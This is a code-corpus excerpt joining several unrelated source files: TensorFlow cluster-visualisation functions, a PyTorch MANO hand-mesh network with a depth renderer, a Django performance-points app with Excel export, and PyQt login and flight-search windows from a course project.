z_l = tf.random.normal(shape = [1,model.local_latent_dims])
z_l = tf.tile(z_l, [100,1])
x_generated,_ = model.decode(z_g,z_l)
h,w,channel = model.image_shape[1:4]
n = np.sqrt(100).astype(np.int32)
canvas = np.empty((h*n, w*n, 3))
for i in range(n):
for j in range(n):
canvas[i*h:(i+1)*h, j*w:(j+1)*w,:] = x_generated[i*n+j].numpy().reshape(h, w, 3)
plt.figure(figsize=(8, 8))
plt.imshow(canvas, cmap='gray')
if filename is None:
plt.savefig(filepath + 'generate_cluster_' + vary + '.png')
else:
plt.savefig(filepath + filename + '.png')
plt.close()
return canvas
def unseen_cluster_lg(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
cluster_dict = defaultdict(list)
for i,test_data in enumerate(test_dataset):
if label:
images = test_data[0]
else:
images = test_data
x_test = images
_, y_logits = model.get_y(x_test)
y = tf.nn.softmax(y_logits, axis=1)
cluster = tf.argmax(y,axis=1)
for c in range(model.y_size):
cluster_samples = tf.unstack(x_test[cluster==c][:,:,:,:3])
score = tf.unstack(y[cluster==c][:,c])
if len(score)>0:
cluster_dict[c] += zip(score,cluster_samples)
global h, w, channel
h,w = x_test.shape[1:3]
channel = 3
for c in range(model.y_size):
if len(cluster_dict[c])>0:
# print(cluster_dict[c])
cluster_dict[c].sort(key=lambda x: x[0], reverse=True)
cluster_samples = tf.stack([p[1] for p in cluster_dict[c][:7]])
num_samples = cluster_samples.shape[0]
# print(f'Cluster: {c}, samples: {num_samples}')
# if num_samples!=0: #draw only existing cluster
canvas = np.empty((h, w*num_samples, channel))
for j in range(num_samples):
canvas[0:h, j*w:(j+1)*w, :] = (cluster_samples[j]+1)*0.5
plt.figure()
plt.imshow(canvas)
plt.savefig(filepath + 'unseen_cluster_' + filename + '_' + str(c) + '.png')
plt.close()
# discrete_y = tf.one_hot(tf.argmax(y_logits,axis=1),model.y_size)
# z_prior_mean, z_prior_sig = model.encode_y(discrete_y)
# _, z_x_hat = model.encode(x_test)
# z_x = []
# for mean, sig in zip(z_prior_mean, z_prior_sig):
# z_x.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
# z_x = tf.reshape(tf.stack(z_x,axis=0),(10*n,model.global_latent_dims))
# z_x_hat = tf.reshape(tf.tile(z_x_hat,[1,10]),[10*z_x_hat.shape[0],z_x_hat.shape[1]]) # repeat 10 times
# x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
# canvas_1 = np.empty((h*n+h, w*n, channel))
# for i in range(n):
# canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
# canvas_1[h:h*n+h,i*w:(i+1)*w, :] = x_recon[i*n:(i+1)*n].numpy().reshape((h*n,w,channel))
# plt.figure(figsize=(2*n,2))
# plt.imshow(canvas_1)
# if filename is None:
# plt.savefig(filepath + 'unseen_cluster.png')
# else:
# plt.savefig(filepath + 'unseen_cluster' + filename + '.png')
# plt.close()
return canvas
def unseen_cluster_lg_svhn(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
cluster = defaultdict(list)
idx = tf.constant([26,101,3025,3129,3182,3233,3547,3695,10462,10471,10601,10608,16171,16289,
16593,16801,101,326,333,798,841,1189,6186,2651,1437,1826,5536,0,3040,3065,3106,3292,3762,
10427,10814,16338,16505,16606,16655,16875,16880],dtype=tf.int32)
test_data = loadmat('data/SVHN/test_32x32.mat')['X'].transpose((3,0,1,2)).astype(np.float32)/255.*2 - 1
# rand_x_idx = tf.random.shuffle(idx)[:n]
# x_test = test_data[rand_x_idx.numpy()]
x_test = test_data[idx]
h,w, channel = x_test.shape[1:4]
x_test = tf.tile(x_test,[1,1,1,2])
y, y_logits = model.get_y(x_test)
cluster = tf.argmax(y_logits,axis=1)
for i in range(model.y_size):
cluster_samples = x_test[cluster==i]
num_samples = cluster_samples.shape[0]
if num_samples!=0: #draw only existing cluster
canvas = np.empty((h, w*num_samples, channel))
for j in range(num_samples):
canvas[0:h, j*w:(j+1)*w, :] = (cluster_samples[j,:,:,:3]+1)*0.5
plt.figure()
plt.imshow(canvas)
plt.savefig(filepath + 'unseen_cluster_' + filename + '_' + str(i) + '.png')
plt.close()
# y, y_logits = model.get_y(x_test)
# discrete_y = tf.one_hot(tf.argmax(y_logits,axis=1),model.y_size)
# z_prior_mean, z_prior_sig = model.encode_y(discrete_y)
# _, z_x_hat = model.encode(x_test)
# z_x = []
# for mean, sig in zip(z_prior_mean, z_prior_sig):
# z_x.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
# z_x = tf.reshape(tf.stack(z_x,axis=0),(10*n,model.global_latent_dims))
# z_x_hat = tf.reshape(tf.tile(z_x_hat,[1,10]),[10*z_x_hat.shape[0],z_x_hat.shape[1]]) # repeat 10 times
# x_recon, x_hat_recon = model.decode(z_x, z_x_hat, True)
# canvas_1 = np.empty((h*n+h, w*n, channel))
# for i in range(n):
# canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
# canvas_1[h:h*n+h,i*w:(i+1)*w, :] = x_recon[i*n:(i+1)*n].numpy().reshape((h*n,w,channel))
# # plt.figure(figsize=(2*n,2))
# plt.imshow(canvas_1)
# if filename is None:
# plt.savefig(filepath + 'unseen_cluster.png')
# else:
# plt.savefig(filepath + 'unseen_cluster' + filename + '.png')
# plt.close()
return canvas
def unseen_cluster(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
for test_data in test_dataset:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
global h, w, channel
h,w = x_test.shape[1:3]
channel = 3
y, y_logits = model.get_y(x_test)
discrete_y = tf.one_hot(tf.argmax(y_logits,axis=1),model.y_size)
z_prior_mean, z_prior_sig = model.encode_y(discrete_y)
z_x = []
for mean, sig in zip(z_prior_mean, z_prior_sig):
z_x.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
z_x = tf.reshape(z_x,(10*n,model.global_latent_dims))
x_recon = model.decode(z_x, True)
canvas_1 = np.empty((h*n+h, w*n, channel))
for i in range(n):
canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
canvas_1[h:h*n+h,i*w:(i+1)*w, :] = x_recon[i*n:(i+1)*n].numpy().reshape((h*n,w,channel))
# plt.figure(figsize=(2*n,2))
plt.imshow(canvas_1)
if filename is None:
plt.savefig(filepath + 'unseen_cluster.png')
else:
plt.savefig(filepath + 'unseen_cluster' + filename + '.png')
plt.close()
return canvas_1
def unseen_cluster_svhn(model, test_dataset, label=True, filename = None, filepath = None, n = 10):
idx = tf.constant([26,101,3025,3129,3182,3233,3547,3695,10462,10471,10601,10608,16171,16289,
16593,16801,101,326,333,798,841,1189,6186,2651,1437,1826,5536,0,3040,3065,3106,3292,3762,
10427,10814,16338,16505,16606,16655,16875,16880],dtype=tf.int32)
test_data = loadmat('data/SVHN/test_32x32.mat')['X'].transpose((3,0,1,2)).astype(np.float32)/255.*2 - 1
rand_x_idx = tf.random.shuffle(idx)[:n]
x_test = test_data[rand_x_idx.numpy()]
h,w, channel = x_test.shape[1:4]
y, y_logits = model.get_y(x_test)
discrete_y = tf.one_hot(tf.argmax(y_logits,axis=1),model.y_size)
z_prior_mean, z_prior_sig = model.encode_y(discrete_y)
z_x = []
for mean, sig in zip(z_prior_mean, z_prior_sig):
z_x.append(tf.random.normal(shape = [10, model.global_latent_dims],mean=mean, stddev=sig))
z_x = tf.reshape(z_x,(10*n,model.global_latent_dims))
x_recon = model.decode(z_x, True)
canvas_1 = np.empty((h*n+h, w*n, channel))
for i in range(n):
canvas_1[0:h, i*w:(i+1)*w, :] = (x_test[i,:,:,:3]+1)*0.5
canvas_1[h:h*n+h,i*w:(i+1)*w, :] = x_recon[i*n:(i+1)*n].numpy().reshape((h*n,w,channel))
# plt.figure(figsize=(2*n,2))
plt.imshow(canvas_1)
if filename is None:
plt.savefig(filepath + 'unseen_cluster.png')
else:
plt.savefig(filepath + 'unseen_cluster' + filename + '.png')
plt.close()
return canvas_1
``` |
{
"source": "517030910405/mano_test",
"score": 2
} |
#### File: mano_test/mano/net_mano.py
```python
import os
import numpy as np
import torch
import torch.nn as nn
from torch.nn import Module
import neural_renderer as nr
from pose.manopth.manopth.manolayer import ManoLayer
from .theta_regressor import ThetaRegressor
class EncEncoder(nn.Module):
def __init__(self, inp_ch, out_ch, name='enc'):
super(EncEncoder, self).__init__()
self.name=name
self.inp_ch = inp_ch
self.out_ch = out_ch
self.encenc = nn.Sequential()
# (64x64 -> 1x1)
ds_reslu = [
32,
16,
8,
4,
2,
1,
]
for reslu in ds_reslu:
if reslu == 4 or reslu == 2:
mid_ch = inp_ch * 2
elif reslu == 1:
mid_ch = self.out_ch
else:
mid_ch = inp_ch
kernel_size = 3
self.encenc.add_module(
name = self.name + '_conv_{}'.format(reslu),
module = nn.Conv2d(
inp_ch,
mid_ch,
kernel_size=kernel_size,
stride=2,
padding=(kernel_size-1)//2,
bias=True
)
)
if reslu != 1:
self.encenc.add_module(
name = self.name + '_bn_{}'.format(reslu),
module = nn.BatchNorm2d(mid_ch)
)
self.encenc.add_module(
name = self.name + '_relu_{}'.format(reslu),
module = nn.LeakyReLU(inplace=True)
)
inp_ch = mid_ch
def forward(self, x):
batch_size = x.shape[0]
return self.encenc(x).reshape(batch_size, -1) #(B, 2048)
class ManoRender(nn.Module):
def __init__(
self,
fill_back=True,
):
super(ManoRender, self).__init__()
self.fill_back=fill_back
''' Render Depth '''
def forward(
self,
vertices,
faces,
Ks=None,
Rs=None,
ts=None,
dist_coeffs=None,
bbxs=None,
image_size=64,
orig_size=64,
anti_aliasing=False,
far = 100.0,
):
# batch_size = vertices.shape(0)
if self.fill_back:
faces = torch.cat(
(
faces,
faces[:, :, list(reversed(range(faces.shape[-1])))]
),
dim=1,
).to(vertices.device).detach()
if Ks is None:
print("K must not None if render depthmap")
raise Exception()
if Rs is None:
Rs = torch.Tensor(
[
[1,0,0],
[0,1,0],
[0,0,1],
]
).view((1,3,3)).to(vertices.device)
if ts is None:
ts = torch.Tensor([0,0,0]).view((1,3)).to(vertices.device)
if dist_coeffs is None:
dist_coeffs = torch.Tensor([[0., 0., 0., 0., 0.]]).to(vertices.device)
''' xyz -> uvd '''
vertices = self.projection(
vertices, Ks, Rs, ts, dist_coeffs, orig_size, bbxs=bbxs
)
faces = nr.vertices_to_faces(vertices, faces)
# rasteriation
rast = nr.rasterize_depth(faces, image_size, anti_aliasing, far=far)
# normalize to 0~1
rend = self.normalize_depth(rast, far=far)
return rend
def normalize_depth(self, img, far):
img_inf = torch.eq(img, far * torch.ones_like(img)).type(torch.float32) #Bool Tensor
img_ok = 1-img_inf #Bool Tensor
img_no_back = img_ok * img #Float Tensor
img_max = img_no_back.max(dim=1,keepdim=True)[0] #batch of max value
img_max = img_max.max(dim=2,keepdim=True)[0]
img_min = img.min(dim=1,keepdim = True)[0] #batch of min values
img_min = img_min.min(dim=2,keepdim = True)[0]
new_depth = (img_max - img)/(img_max - img_min)
new_depth = torch.max(new_depth, torch.zeros_like(new_depth))
new_depth = torch.min(new_depth, torch.ones_like(new_depth))
return new_depth
def projection(
self,
vertices,
Ks,
Rs,
ts,
dist_coeffs,
orig_size,
bbxs=None,
eps=1e-9,
):
'''
Calculate projective transformation of vertices given a projection matrix
Input parameters:
K: batch_size * 3 * 3 intrinsic camera matrix
R, t: batch_size * 3 * 3, batch_size * 1 * 3 extrinsic calibration parameters
dist_coeffs: vector of distortion coefficients
orig_size: original size of image captured by the camera
Returns: For each point [X,Y,Z] in world coordinates [u,v,z]
where u,v are the coordinates of the projection in
pixels and z is the depth
Modified by <NAME>: add bbx
'''
# instead of P*x we compute x'*P'
vertices = torch.matmul(vertices, Rs.transpose(2,1)) + ts
x, y, z = vertices[:, :, 0], vertices[:, :, 1], vertices[:, :, 2]
x_ = x / (z + eps)
y_ = y / (z + eps)
# Get distortion coefficients from vector
k1 = dist_coeffs[:, None, 0]
k2 = dist_coeffs[:, None, 1]
p1 = dist_coeffs[:, None, 2]
p2 = dist_coeffs[:, None, 3]
k3 = dist_coeffs[:, None, 4]
# we use x_ for x' and x__ for x'' etc.
r = torch.sqrt(x_ ** 2 + y_ ** 2)
x__ = x_*(1 + k1*(r**2) + k2*(r**4) + k3*(r**6)) + 2*p1*x_*y_ + p2*(r**2 + 2*x_**2)
y__ = y_*(1 + k1*(r**2) + k2*(r**4) + k3 *(r**6)) + p1*(r**2 + 2*y_**2) + 2*p2*x_*y_
vertices = torch.stack([x__, y__, torch.ones_like(z)], dim=-1)
vertices = torch.matmul(vertices, Ks.transpose(1,2))
u, v = vertices[:, :, 0], vertices[:, :, 1]
if bbxs is not None:
u = (u - bbxs[:,0:1])/bbxs[:,2:3] * orig_size
v = (v - bbxs[:,1:2])/bbxs[:,3:4] * orig_size
# map u,v from [0, img_size] to [-1, 1] to use by the renderer
v = orig_size - v
u = 2 * (u - orig_size / 2.) / orig_size
v = 2 * (v - orig_size / 2.) / orig_size
vertices = torch.stack([u, v, z], dim=-1)
return vertices
class NetMano(nn.Module):
def __init__(
self,
mano_ncomps=6,
mano_root_idx=0,
mano_flat_hand_mean=True,
mano_hand_side='right',
mano_template_root='mano/models',
mano_scale_milimeter=False,
reg_inp_encs=['hm','dep'],
reg_inp_enc_res=64,
reg_niter=10,
reg_nfeats=2048,
njoints=21,
):
super(NetMano, self).__init__()
self.reg_inp_encs = reg_inp_encs
self.ncomps = mano_ncomps
self.render_res = reg_inp_enc_res
self.reg_ntheta = 3 + mano_ncomps + 10 # 3 rots, 6 ncomps, 10 betas = 19
enc_ch = len(reg_inp_encs) * 256
self.enc_conv = nn.Conv2d(enc_ch, 256, kernel_size=1, stride=1, bias=True)
self.enc_encoder = EncEncoder(inp_ch=256, out_ch=reg_nfeats, name='encenc')
self.pred_ch = njoints + 1 # njoints heatmap + 1 depth
self.pred_conv = nn.Conv2d(self.pred_ch, 256, kernel_size=1, stride=1, bias=True)
self.pred_encoder = EncEncoder(inp_ch=256, out_ch=reg_nfeats, name='predenc')
self.leaky_relu = nn.LeakyReLU(inplace=True)
self.bn = nn.BatchNorm2d(256)
fc_layers = [
reg_nfeats + self.reg_ntheta, # 2048 + 19
1024,
1024,
self.reg_ntheta # 19
]
use_dropout = [True, True, False]
drop_prob = [0.3, 0.3, 0.3]
self.regressor = ThetaRegressor(
fc_layers=fc_layers,
use_dropout=use_dropout,
drop_prob=drop_prob,
ncomps=mano_ncomps,
iterations=reg_niter,
)
self.manolayer = ManoLayer(
root_idx=mano_root_idx,
flat_hand_mean=mano_flat_hand_mean,
ncomps=mano_ncomps,
hand_side=mano_hand_side,
template_root=mano_template_root,
scale_milimeter=mano_scale_milimeter,
)
template_pth = os.path.join(mano_template_root, 'HAND_TEMPLATE_RIGHT.obj')
self.template = nr.Mesh.fromobj(template_pth)
self.manorender = ManoRender()
def forward(self, encodings, hms, deps, poses_root, Ks, bbxs):
### prepare encodings
batch_size = hms.shape[0]
enc_list = []
for key in self.reg_inp_encs:
enc_list.append(encodings[key])
enc = torch.cat(enc_list, dim=1) #(B, 256x2, 64, 64)
enc = self.enc_conv(enc) #(B, 256, 64, 64)
enc = self.bn(enc)
enc = self.leaky_relu(enc)
enc = self.enc_encoder(enc) #(B, 2048)
x = torch.cat((hms, deps), dim=1) #(B, 22, 64, 64)
x = self.pred_conv(x) #(B, 256, 64, 64)
x = self.bn(x)
x = self.leaky_relu(x)
x = self.pred_encoder(x) #(B, 2048)
x = x + enc
thetas = self.regressor(x)
theta = thetas[-1]
th_pose_coeffs = theta[:, :(3+self.ncomps)] #(B, 0:9)
th_betas = theta[:, (3+self.ncomps):] #(B, 9:19)
verts, joints = self.manolayer(th_pose_coeffs, th_betas, poses_root)
faces = self.template.faces.unsqueeze(0).repeat((batch_size, 1, 1))
rendered = self.manorender(
vertices=verts,
faces=faces,
Ks=Ks,
bbxs=bbxs,
far=100.0,
image_size=self.render_res,
orig_size=self.render_res,
)
return verts, joints, rendered
``` |
{
"source": "519389812/management",
"score": 2
} |
#### File: management/perf/models.py
```python
from __future__ import unicode_literals
from django.db import models
#from django import forms
#from django.forms import ModelForm
import django.utils.timezone as timezone
# Create your models here.
perf_choices = (
(15.0,'加柜台/小时'),
(5.0,'挑行李/件'),
(20.0,'协助481/小时'),
(10.0,'结关/班'),
)
team_choices = (
('一室','一室'),
('二室','二室'),
('三室','三室'),
('团队','团队'),
)
verify_choices = (
('等待审核','等待审核'),
('未通过审核','未通过审核'),
('已审核','已审核'),
)
class Add(models.Model):
perf_id = models.AutoField(primary_key=True,verbose_name='序号')
name = models.CharField(max_length=8,verbose_name='姓名')
team = models.CharField(max_length=4,choices=team_choices,verbose_name='室别')
performance = models.FloatField(max_length=4,choices=perf_choices,verbose_name='加分项')
values = models.FloatField(max_length=4,verbose_name='数值')
workload = models.FloatField(max_length=4,default=0.0,verbose_name='绩效人数')
point = models.FloatField(max_length=4,default=0.0,verbose_name='绩效加分')
date = models.DateField(default=timezone.now,verbose_name='日期')
verify = models.CharField(max_length=8,default='等待审核',choices=verify_choices,verbose_name='审核状态')
def __unicode__(self):
return u'%s>>>>%s>>>>%s>>>>%s>>>>%s>>>>%s'%(self.name,self.team,self.workload,self.point,self.date,self.verify)
class Meta:
verbose_name='摘要'
verbose_name_plural='绩效登记'
year_choices = (
(2016,'2016'),
#(2017,'2017'),
)
month_choices = (
(1,'01'),
(2,'02'),
(3,'03'),
(4,'04'),
(5,'05'),
(6,'06'),
(7,'07'),
(8,'08'),
(9,'09'),
(10,'10'),
(11,'11'),
(12,'12'),
)
class Count(models.Model):
name = models.CharField(max_length=8,verbose_name='姓名')
team = models.CharField(max_length=4,choices=team_choices,verbose_name='室别')
year = models.IntegerField(verbose_name='年份',choices=year_choices)
month = models.IntegerField(verbose_name='月份',choices=month_choices)
workload = models.FloatField(max_length=4,default=0.0,verbose_name='绩效人数')
point = models.FloatField(max_length=4,default=0.0,verbose_name='绩效加分')
def __unicode__(self):
return u'%s>>>>%s>>>>%s>>>>%s>>>>%s'%(self.name,self.team,self.workload,self.point,self.date)
class Meta:
verbose_name='摘要'
verbose_name_plural='绩效统计'
```
#### File: management/perf/views.py
```python
from django.shortcuts import render,render_to_response
from django.http import HttpResponse,HttpResponseRedirect
from perf.models import Add,Count
from perf.forms import AddForm,CountForm,VerifyForm
import sqlite3
import sys
#from __future__ import unicode_literals
from django.http import JsonResponse
import xlwt
from cStringIO import StringIO
from django.core.exceptions import ObjectDoesNotExist
import json
# Create your views here.
def add(req):
if req.method == 'POST':
form = AddForm(req.POST)
if form.is_valid():
perf_num=form.cleaned_data['performance']
values_num=form.cleaned_data['values']
new_perf=form.save(commit=False)
if perf_num == 5.0:
new_perf.workload = perf_num*values_num
elif perf_num == 10.0:
new_perf.workload = perf_num*values_num
elif perf_num == 15.0:
new_perf.point = perf_num*values_num
else:
new_perf.point = perf_num*values_num
new_perf.save()
form.save_m2m()
return HttpResponse('提交成功!')
else:
form = AddForm()
return render_to_response('add.html',{'form':form})
def excel_output(req):
wb = xlwt.Workbook(encoding = 'utf-8')
sheet = wb.add_sheet(u'统计')
response = HttpResponse(content_type='application/vnd.ms-excel')
response['Content-Disposition'] = 'attachment;filename=export_performance.xls'
sheet.write(0,0, '姓名')
sheet.write(0,1, '室别')
sheet.write(0,2, '年份')
sheet.write(0,3, '月份')
sheet.write(0,4, '工作量')
sheet.write(0,5, '绩效加分')
row = 1
for count in Count.objects.all():
sheet.write(row,0, count.name)
sheet.write(row,1, count.team)
sheet.write(row,2, count.year)
sheet.write(row,3, count.month)
sheet.write(row,4, count.workload)
sheet.write(row,5, count.point)
row = row + 1
output = StringIO()
wb.save(output)
output.seek(0)
response.write(output.getvalue())
return response
def count(req):
if req.method == 'POST':
form = CountForm(req.POST)
if form.is_valid():
Count.objects.all().delete()
date_year = form.cleaned_data['year']
date_month = form.cleaned_data['month']
sets = Add.objects.filter(date__year = date_year, date__month = date_month,verify = '等待审核')
for set in sets:
if len(Count.objects.filter(name = set.name))>0:
get = Count.objects.get(name = set.name)
get.workload = get.workload + set.workload
get.point = get.point + set.point
get.save()
else:
create = Count(name=set.name,team=set.team,workload=set.workload,point=set.point,year=date_year,month=date_month)
create.save()
return HttpResponseRedirect('/excel_download/')
else:
form = CountForm()
return render_to_response('count.html',{'form':form})
def verify(req):
details = Add.objects.filter(verify='等待审核')
list_detail = list()
for detail in details:
list_detail.append(str(detail.name))
#dict_detail = {'姓名':detail.name,'室别':detail.team,'绩效类型':detail.performance,'绩效量':detail.values,'日期':str(detail.date)}
return JsonResponse(list_detail,safe=False)
``` |
{
"source": "519401113/course-design",
"score": 2
} |
#### File: 519401113/course-design/login.py
```python
from PyQt5.QtWidgets import *
from PyQt5.QtSql import *
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
power = 0 #权限
username = '' #用户名
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(410, 398)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
font = QtGui.QFont()
font.setFamily("Adobe Devanagari")
font.setPointSize(16)
self.label.setFont(font)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.user_name = QtWidgets.QLineEdit(Dialog)
self.user_name.setObjectName("user_name")
self.verticalLayout.addWidget(self.user_name)
self.label_3 = QtWidgets.QLabel(Dialog)
self.label_3.setObjectName("label_3")
self.verticalLayout.addWidget(self.label_3)
self.password = QtWidgets.QLineEdit(Dialog)
self.password.setEchoMode(QtWidgets.QLineEdit.Password)
self.password.setObjectName("password")
self.verticalLayout.addWidget(self.password)
self.cancel = QtWidgets.QPushButton(Dialog)
self.cancel.setObjectName("cancel")
self.verticalLayout.addWidget(self.cancel)
self.login = QtWidgets.QPushButton(Dialog)
self.login.setObjectName("login")
self.verticalLayout.addWidget(self.login)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.login.clicked.connect(self.login_check)
self.cancel.clicked.connect(self.window_close)
self.user_name.returnPressed.connect(self.login_check)
self.password.returnPressed.connect(self.login_check)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "机票订购系统登录"))
self.label_2.setText(_translate("Dialog", "用户名"))
self.user_name.setPlaceholderText(_translate("Dialog", "请输入用户名"))
self.label_3.setText(_translate("Dialog", "密码"))
self.password.setPlaceholderText(_translate("Dialog", "请输入密码"))
self.cancel.setText(_translate("Dialog", "取消"))
self.login.setText(_translate("Dialog", "登录"))
def login_check(self):
user_name = self.user_name.text()
password = self.password.text()
if (user_name == "" or password == ""):
print(QMessageBox.warning(self, "警告", "用户名和密码不可为空!", QMessageBox.Yes))
return
# 进行数据库操作
query = QSqlQuery() # 新建sql对象
query.prepare('SELECT * FROM 用户表 '
'WHERE 用户名 = :user_name') # 输入SQL语句
query.bindValue(":user_name", user_name) # 绑定占位符和相应的功能
query.exec_()
if (not query.next()):
print(QMessageBox.information(self, "提示", "该账号不存在!", QMessageBox.Yes))
else:
if (user_name == query.value(0) and password == query.value(1)):
if (query.value(2) == 1):
# 跳转到后续管理员窗口
print(QMessageBox.information(self, "提示", "登录成功!", QMessageBox.Yes))
self.power = 2
self.username = user_name
# 跳转到后续用户窗口
else:
print(QMessageBox.information(self, "提示", "登录成功!", QMessageBox.Yes))
self.power = 1
self.username = user_name
else:
print(QMessageBox.information(self, "提示", "密码错误!", QMessageBox.Yes))
return
def window_close(self):
self.close()
# 添加后续窗口
```
#### File: 519401113/course-design/search.py
```python
from PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QHeaderView
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtSql import *
import sys
import register
import login
import register_win
import register_fail
import jump_buy
import add_flight
class Register_Window(QDialog, register.Ui_Dialog):
def __init__(self, parent = None):
super(Register_Window, self).__init__(parent)
self.setupUi(self)
class Login_Window(QDialog, login.Ui_Dialog):
def __init__(self, parent = None):
super(Login_Window, self).__init__(parent)
self.setupUi(self)
class Jump_Buy_Window(QDialog, jump_buy.Ui_Dialog_jump_buy):
def __init__(self, parent=None):
super(Jump_Buy_Window, self).__init__(parent)
self.setupUi(self)
class Add_Flight_Window(QDialog, add_flight.Ui_Dialog):
def __init__(self,parent = None):
super(Add_Flight_Window, self).__init__(parent)
self.setupUi(self)
class Ui_MainWindow(object):
state = -1 # 选中的票的状态,0为出发-目的,1为出发-经停,2为经停-目的,-1为未被选中
username = ''
num = -1 #选中航程号
index = -1
power = 0 # 权限0为未登录,1为用户,2为管理员
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1600, 900)
MainWindow.setMinimumSize(QtCore.QSize(567, 384))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("flight.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_departure = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_departure.sizePolicy().hasHeightForWidth())
self.label_departure.setSizePolicy(sizePolicy)
self.label_departure.setAlignment(QtCore.Qt.AlignCenter)
self.label_departure.setObjectName("label_departure")
self.horizontalLayout_2.addWidget(self.label_departure)
self.comboBox_departure = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_departure.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.comboBox_departure.sizePolicy().hasHeightForWidth())
self.comboBox_departure.setSizePolicy(sizePolicy)
self.comboBox_departure.setEditable(False)
self.comboBox_departure.setObjectName("comboBox_departure")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.horizontalLayout_2.addWidget(self.comboBox_departure)
self.label_destination = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_destination.sizePolicy().hasHeightForWidth())
self.label_destination.setSizePolicy(sizePolicy)
self.label_destination.setAlignment(QtCore.Qt.AlignCenter)
self.label_destination.setObjectName("label_destination")
self.horizontalLayout_2.addWidget(self.label_destination)
self.comboBox_destination = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_destination.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.comboBox_destination.sizePolicy().hasHeightForWidth())
self.comboBox_destination.setSizePolicy(sizePolicy)
self.comboBox_destination.setEditable(False)
self.comboBox_destination.setObjectName("comboBox_destination")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.horizontalLayout_2.addWidget(self.comboBox_destination)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_date = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_date.sizePolicy().hasHeightForWidth())
self.label_date.setSizePolicy(sizePolicy)
self.label_date.setAlignment(QtCore.Qt.AlignCenter)
self.label_date.setObjectName("label_date")
self.horizontalLayout_4.addWidget(self.label_date)
self.dateEdit = QtWidgets.QDateEdit(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
